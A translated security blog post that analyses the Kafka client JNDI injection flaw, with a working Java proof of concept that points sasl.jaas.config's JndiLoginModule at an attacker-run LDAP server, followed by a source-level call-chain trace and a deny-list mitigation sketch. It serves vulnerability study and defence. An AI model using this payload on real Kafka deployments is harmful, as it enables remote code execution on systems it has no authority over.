Preface

Today I read 4ra1n's post "Kafka Connect RCE 如何检测" (on detecting the Kafka Connect RCE) and found it very rewarding, so I decided to analyze this vulnerability myself and understand how it works.
POC

Import the dependency:
```xml
<dependency>
    <groupId>org.apache.kafka</groupId>
    <artifactId>kafka-clients</artifactId>
    <version>3.3.0</version>
</dependency>
```
The POC is as follows:
```java
public static void main(String[] args) {
    Properties props = new Properties();
    props.put("sasl.mechanism", "SCRAM-SHA-256");
    props.put("security.protocol", "SASL_SSL");
    props.put("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule "
            + "required user.provider.url=\"ldap://192.168.135.132:1389/Deserialization/URLDNS/26ed58ce.ipv6.1433.eu.org\" "
            + "useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" "
            + "group.provider.url=\"xxx\";");
    props.put("bootstrap.servers", "123123123:123");
    props.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
    props.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
    props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
    props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
    new Thread(() -> {
        Producer<String, String> producer = new KafkaProducer<>(props);
        producer.send(new ProducerRecord<>("test", "hello", "world"));
        producer.close();
    }).start();
}
```
Execution result:
Vulnerability Analysis

First, step into org.apache.kafka.clients.producer.KafkaProducer#KafkaProducer(java.util.Properties):
This delegates to org.apache.kafka.clients.producer.KafkaProducer#KafkaProducer(java.util.Properties, org.apache.kafka.common.serialization.Serializer, org.apache.kafka.common.serialization.Serializer); stepping in:
It first calls org.apache.kafka.common.utils.Utils#propsToMap to process the Properties object we passed in; the code is as follows:
As the name suggests, it converts the Properties object into a Map; the result looks like this:
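To make the conversion step concrete, here is a hedged sketch of what Utils#propsToMap does (the exception type and exact checks are assumptions based on the behavior described above, not the verbatim kafka-clients source):

```java
import java.util.HashMap;
import java.util.Map;
import java.util.Properties;

public class PropsToMapSketch {
    // Sketch of Utils#propsToMap: copy each Properties entry into a
    // Map<String, Object>, rejecting non-String keys.
    public static Map<String, Object> propsToMap(Properties properties) {
        Map<String, Object> map = new HashMap<>(properties.size());
        for (Map.Entry<Object, Object> entry : properties.entrySet()) {
            if (!(entry.getKey() instanceof String)) {
                throw new IllegalArgumentException("Key must be a string: " + entry.getKey());
            }
            map.put((String) entry.getKey(), entry.getValue());
        }
        return map;
    }

    public static void main(String[] args) {
        Properties props = new Properties();
        props.put("sasl.mechanism", "SCRAM-SHA-256");
        System.out.println(propsToMap(props).get("sasl.mechanism")); // prints SCRAM-SHA-256
    }
}
```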
The resulting Map is then passed to org.apache.kafka.clients.producer.KafkaProducer#KafkaProducer(java.util.Map<java.lang.String,java.lang.Object>, org.apache.kafka.common.serialization.Serializer, org.apache.kafka.common.serialization.Serializer):
which calls org.apache.kafka.clients.producer.ProducerConfig#appendSerializerToConfig:
Here both keySerializer and valueSerializer are null, which is why the Properties object we build at the start must contain entries for key.serializer and value.serializer; otherwise an exception is thrown immediately. The resulting newConfigs is then passed to org.apache.kafka.clients.producer.ProducerConfig#ProducerConfig(java.util.Map<java.lang.String,java.lang.Object>):
This finally yields a ProducerConfig object whose fields look like this:
These arguments are then passed to org.apache.kafka.clients.producer.KafkaProducer#KafkaProducer(org.apache.kafka.clients.producer.ProducerConfig, org.apache.kafka.common.serialization.Serializer, org.apache.kafka.common.serialization.Serializer, org.apache.kafka.clients.producer.internals.ProducerMetadata, org.apache.kafka.clients.KafkaClient, org.apache.kafka.clients.producer.internals.ProducerInterceptors<K,V>, org.apache.kafka.common.utils.Time):
```java
KafkaProducer(ProducerConfig config,
              Serializer<K> keySerializer,
              Serializer<V> valueSerializer,
              ProducerMetadata metadata,
              KafkaClient kafkaClient,
              ProducerInterceptors<K, V> interceptors,
              Time time) {
    try {
        this.producerConfig = config;
        this.sender = this.newSender(logContext, kafkaClient, this.metadata);
        String ioThreadName = "kafka-producer-network-thread | " + this.clientId;
        this.ioThread = new KafkaThread(ioThreadName, this.sender, true);
        this.ioThread.start();
        config.logUnused();
        AppInfoParser.registerAppInfo("kafka.producer", this.clientId, this.metrics, time.milliseconds());
        this.log.debug("Kafka producer started");
    } catch (Throwable var24) {
        this.close(Duration.ofMillis(0L), true);
        throw new KafkaException("Failed to construct kafka producer", var24);
    }
}
```
This assigns this.producerConfig and then calls org.apache.kafka.clients.producer.KafkaProducer#newSender. The method's parameters don't matter here; going straight to the code:
We can see that it calls org.apache.kafka.clients.ClientUtils#createChannelBuilder; following along:
Here config is this.producerConfig. The method reads the values of security.protocol and sasl.mechanism from config and assigns them to the corresponding variables; securityProtocol is:
It then calls org.apache.kafka.common.network.ChannelBuilders#clientChannelBuilder:
This checks whether securityProtocol is SASL_PLAINTEXT or SASL_SSL and, if so, enters the branch. It then checks whether contextType is null (it is not), and clientSaslMechanism is the value of sasl.mechanism, i.e. SCRAM-SHA-256 from our POC:
So a sasl.mechanism value is mandatory; otherwise an exception is thrown. Next, org.apache.kafka.common.network.ChannelBuilders#create is called:
```java
private static ChannelBuilder create(SecurityProtocol securityProtocol, Mode mode, JaasContext.Type contextType,
                                     AbstractConfig config, ListenerName listenerName, boolean isInterBrokerListener,
                                     String clientSaslMechanism, boolean saslHandshakeRequestEnable,
                                     CredentialCache credentialCache, DelegationTokenCache tokenCache,
                                     Time time, LogContext logContext, Supplier<ApiVersionsResponse> apiVersionSupplier) {
    Map<String, Object> configs = channelBuilderConfigs(config, listenerName);
    Object channelBuilder;
    switch (securityProtocol) {
        case SSL:
            requireNonNullMode(mode, securityProtocol);
            channelBuilder = new SslChannelBuilder(mode, listenerName, isInterBrokerListener, logContext);
            break;
        case SASL_SSL:
        case SASL_PLAINTEXT:
            requireNonNullMode(mode, securityProtocol);
            String sslClientAuthOverride = null;
            Object jaasContexts;
            if (mode != Mode.SERVER) {
                JaasContext jaasContext = contextType == Type.CLIENT ?
                        JaasContext.loadClientContext(configs) :
                        JaasContext.loadServerContext(listenerName, clientSaslMechanism, configs);
                jaasContexts = Collections.singletonMap(clientSaslMechanism, jaasContext);
            } else {
                List<String> enabledMechanisms = (List) configs.get("sasl.enabled.mechanisms");
                jaasContexts = new HashMap(enabledMechanisms.size());
                Iterator var18 = enabledMechanisms.iterator();
                String listenerClientAuth;
                while (var18.hasNext()) {
                    listenerClientAuth = (String) var18.next();
                    ((Map) jaasContexts).put(listenerClientAuth, JaasContext.loadServerContext(listenerName, listenerClientAuth, configs));
                }
                if (listenerName != null && securityProtocol == SecurityProtocol.SASL_SSL) {
                    String configuredClientAuth = (String) configs.get("ssl.client.auth");
                    listenerClientAuth = (String) config.originalsWithPrefix(listenerName.configPrefix(), true).get("ssl.client.auth");
                    if (listenerClientAuth == null) {
                        sslClientAuthOverride = SslClientAuth.NONE.name().toLowerCase(Locale.ROOT);
                        if (configuredClientAuth != null && !configuredClientAuth.equalsIgnoreCase(SslClientAuth.NONE.name())) {
                            log.warn("Broker configuration '{}' is applied only to SSL listeners. Listener-prefixed configuration can be used to enable SSL client authentication for SASL_SSL listeners. In future releases, broker-wide option without listener prefix may be applied to SASL_SSL listeners as well. All configuration options intended for specific listeners should be listener-prefixed.", "ssl.client.auth");
                        }
                    }
                }
            }
            channelBuilder = new SaslChannelBuilder(mode, (Map) jaasContexts, securityProtocol, listenerName,
                    isInterBrokerListener, clientSaslMechanism, saslHandshakeRequestEnable,
                    credentialCache, tokenCache, sslClientAuthOverride, time, logContext, apiVersionSupplier);
            break;
        case PLAINTEXT:
            channelBuilder = new PlaintextChannelBuilder(listenerName);
            break;
        default:
            throw new IllegalArgumentException("Unexpected securityProtocol " + securityProtocol);
    }
    ((ChannelBuilder) channelBuilder).configure(configs);
    return (ChannelBuilder) channelBuilder;
}
```
First a Map named configs is built; some of its entries are the ones we set in the POC. Then the switch statement runs: when securityProtocol is SASL_SSL or SASL_PLAINTEXT, the following line executes:
```java
channelBuilder = new SaslChannelBuilder(mode, (Map) jaasContexts, securityProtocol, listenerName,
        isInterBrokerListener, clientSaslMechanism, saslHandshakeRequestEnable, credentialCache,
        tokenCache, sslClientAuthOverride, time, logContext, apiVersionSupplier);
```
So channelBuilder is a SaslChannelBuilder. After leaving the switch, its configure method is called with configs as the argument. Stepping in:
```java
public void configure(Map<String, ?> configs) throws KafkaException {
    try {
        this.configs = configs;
        // ......
        Iterator var12 = this.jaasContexts.entrySet().iterator();
        while (var12.hasNext()) {
            Map.Entry<String, JaasContext> entry = (Map.Entry) var12.next();
            String mechanism = (String) entry.getKey();
            LoginManager loginManager = LoginManager.acquireLoginManager((JaasContext) entry.getValue(), mechanism, defaultLoginClass, configs);
            this.loginManagers.put(mechanism, loginManager);
            Subject subject = loginManager.subject();
            this.subjects.put(mechanism, subject);
            if (this.mode == Mode.SERVER && mechanism.equals("GSSAPI")) {
                this.maybeAddNativeGssapiCredentials(subject);
            }
        }
        if (this.securityProtocol == SecurityProtocol.SASL_SSL) {
            this.sslFactory = new SslFactory(this.mode, this.sslClientAuthOverride, this.isInterBrokerListener);
            this.sslFactory.configure(configs);
        }
    } catch (Throwable var9) {
        this.close();
        throw new KafkaException(var9);
    }
}
```
where this.jaasContexts is:
Inside the while loop, the following line executes:
```java
LoginManager loginManager = LoginManager.acquireLoginManager((JaasContext) entry.getValue(), mechanism, defaultLoginClass, configs);
```
Step into org.apache.kafka.common.security.authenticator.LoginManager#acquireLoginManager:
Here the value field of jaasConfigValue holds the sasl.jaas.config string from our POC. Since loginManager is null, the constructor org.apache.kafka.common.security.authenticator.LoginManager#LoginManager is called:
where the loginClass field of loginMetadata is:
So this.login is an instance of org.apache.kafka.common.security.authenticator.DefaultLogin. Next, this.login.login() is called; step into org.apache.kafka.common.security.authenticator.AbstractLogin#login:
which in turn calls javax.security.auth.login.LoginContext#login:
This calls javax.security.auth.login.LoginContext#invokePriv, passing LOGIN_METHOD, whose value is "login":
invokePriv ends up delegating to javax.security.auth.login.LoginContext#invoke, part of which looks like this:
```java
private void invoke(String methodName) throws LoginException {
    for (int i = moduleIndex; i < moduleStack.length; i++, moduleIndex++) {
        try {
            int mIndex = 0;
            Method[] methods = null;
            if (moduleStack[i].module != null) {
                methods = moduleStack[i].module.getClass().getMethods();
            } else {
                Class<?> c = Class.forName(
                        moduleStack[i].entry.getLoginModuleName(),
                        true,
                        contextClassLoader);
                Constructor<?> constructor = c.getConstructor(PARAMS);
                Object[] args = { };
                moduleStack[i].module = constructor.newInstance(args);
                methods = moduleStack[i].module.getClass().getMethods();
                for (mIndex = 0; mIndex < methods.length; mIndex++) {
                    if (methods[mIndex].getName().equals(INIT_METHOD)) {
                        break;
                    }
                }
                Object[] initArgs = {subject, callbackHandler, state, moduleStack[i].entry.getOptions()};
                methods[mIndex].invoke(moduleStack[i].module, initArgs);
            }
            for (mIndex = 0; mIndex < methods.length; mIndex++) {
                if (methods[mIndex].getName().equals(methodName)) {
                    break;
                }
            }
            Object[] args = { };
            boolean status = ((Boolean) methods[mIndex].invoke(moduleStack[i].module, args)).booleanValue();
            // ......
```
moduleStack looks like this:
Inside invoke, moduleStack is iterated and, since module is still null, execution enters the else branch:
Here INIT_METHOD has the value "initialize". The code reflectively loads the class named by moduleStack[i].entry.getLoginModuleName(), i.e. com.sun.security.auth.module.JndiLoginModule, enumerates all of its methods, and when it finds initialize, invokes it via reflection.
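The reflective dispatch above can be reduced to a small self-contained sketch (DemoModule and loadAndInvoke are illustrative names of my own, not JDK API):

```java
import java.lang.reflect.Method;

public class ReflectiveInvokeSketch {
    // Stand-in for a login module; only the method name matters here.
    public static class DemoModule {
        public DemoModule() {}
        public boolean login() { return true; }
    }

    // Same pattern as LoginContext#invoke: load the module class by name,
    // instantiate it, scan getMethods() for the first method with the
    // requested name, then invoke it reflectively.
    public static Object loadAndInvoke(String className, String methodName) {
        try {
            Class<?> c = Class.forName(className);
            Object module = c.getConstructor().newInstance();
            for (Method m : c.getMethods()) {
                if (m.getName().equals(methodName)) {
                    return m.invoke(module);
                }
            }
            throw new NoSuchMethodException(methodName);
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        // With the real gadget the names would be
        // "com.sun.security.auth.module.JndiLoginModule" and "login".
        System.out.println(loadAndInvoke("ReflectiveInvokeSketch$DemoModule", "login")); // prints true
    }
}
```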
After the else branch finishes, the following code runs:
```java
for (mIndex = 0; mIndex < methods.length; mIndex++) {
    if (methods[mIndex].getName().equals(methodName)) {
        break;
    }
}
Object[] args = { };
boolean status = ((Boolean) methods[mIndex].invoke(moduleStack[i].module, args)).booleanValue();
```
If the initialize-invocation part above made sense, it is obvious at a glance that this invokes the login method of com.sun.security.auth.module.JndiLoginModule. Stepping in:
```java
public boolean login() throws LoginException {
    try {
        attemptAuthentication(false);
        succeeded = true;
        if (debug) {
            System.out.println("\t\t[JndiLoginModule] " +
                    "regular authentication succeeded");
        }
        return true;
    } catch (LoginException le) {
        cleanState();
        if (debug) {
            System.out.println("\t\t[JndiLoginModule] " +
                    "regular authentication failed");
        }
        throw le;
    }
}
```
This calls com.sun.security.auth.module.JndiLoginModule#attemptAuthentication:
where userProvider was set earlier in the initialize method:
i.e. the malicious LDAP server from our POC:
The subsequent lookup call then completes the JNDI injection.
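Putting the two halves together, the vulnerable pattern can be sketched offline (class and method bodies here are illustrative; in the real JndiLoginModule#attemptAuthentication the sink is roughly `ctx.lookup(userProvider)` on a freshly built context):

```java
import java.util.HashMap;
import java.util.Map;

public class JndiSinkSketch {
    // Sketch of the pattern: initialize() stashes the attacker-controlled
    // "user.provider.url" option, and attemptAuthentication() later feeds
    // it into a JNDI lookup.
    private String userProvider;

    public void initialize(Map<String, ?> options) {
        this.userProvider = (String) options.get("user.provider.url");
    }

    public String attemptAuthentication() {
        // Real module (roughly):
        //   ctx.lookup(userProvider);   // <- JNDI injection sink
        // We only return the URL so this sketch stays offline.
        return userProvider;
    }

    public static void main(String[] args) {
        JndiSinkSketch module = new JndiSinkSketch();
        Map<String, Object> opts = new HashMap<>();
        opts.put("user.provider.url", "ldap://192.168.135.132:1389/Deserialization/URLDNS/x");
        System.out.println(module == null ? "" : run(module, opts));
    }

    private static String run(JndiSinkSketch m, Map<String, Object> opts) {
        m.initialize(opts);
        return m.attemptAuthentication();
    }
}
```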
Finally, the full call chain:
```
new KafkaProducer<>(props)
-> KafkaProducer#KafkaProducer(...)
-> KafkaProducer#newSender(logContext, kafkaClient, this.metadata)
-> ClientUtils#createChannelBuilder(this.producerConfig, this.time, logContext)
-> ChannelBuilders#clientChannelBuilder(...)
-> ChannelBuilders#create(...)
-> ((ChannelBuilder) channelBuilder)#configure(configs)
-> LoginManager#acquireLoginManager(...)
-> new LoginManager(jaasContext, saslMechanism, configs, loginMetadata)
-> LoginContext#login()
-> LoginContext#invokePriv(LOGIN_METHOD)
-> LoginContext#invoke(methodName)
-> JndiLoginModule#login()
-> JndiLoginModule#attemptAuthentication(true)
-> InitialContext#lookup(userProvider)
```
The conditions for exploiting this vulnerability are fairly demanding: JNDI injection via a remote LDAP reference requires a Java version older than 11.0.1 / 8u191 / 7u201 / 6u211, so there are not many exploitable targets to be found on the public internet.
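For completeness: the fix that later shipped in Kafka (KAFKA-14496, for CVE-2023-25194) is reported to deny-list dangerous login modules such as JndiLoginModule in sasl.jaas.config. A minimal guard in the same spirit, as an illustrative sketch rather than Kafka's actual implementation, might look like:

```java
import java.util.Arrays;
import java.util.List;

public class JaasConfigGuard {
    // Illustrative deny-list; Kafka's real fix is reported to use the
    // org.apache.kafka.disallowed.login.modules system property, which
    // disallows JndiLoginModule by default.
    public static final List<String> DISALLOWED = Arrays.asList(
            "com.sun.security.auth.module.JndiLoginModule");

    public static void validate(String jaasConfig) {
        if (jaasConfig == null) return;
        for (String module : DISALLOWED) {
            if (jaasConfig.contains(module)) {
                throw new IllegalArgumentException(module + " is not allowed in sasl.jaas.config");
            }
        }
    }

    public static void main(String[] args) {
        validate("org.apache.kafka.common.security.plain.PlainLoginModule required;"); // passes
        try {
            validate("com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://x\";");
        } catch (IllegalArgumentException e) {
            System.out.println("blocked: " + e.getMessage());
        }
    }
}
```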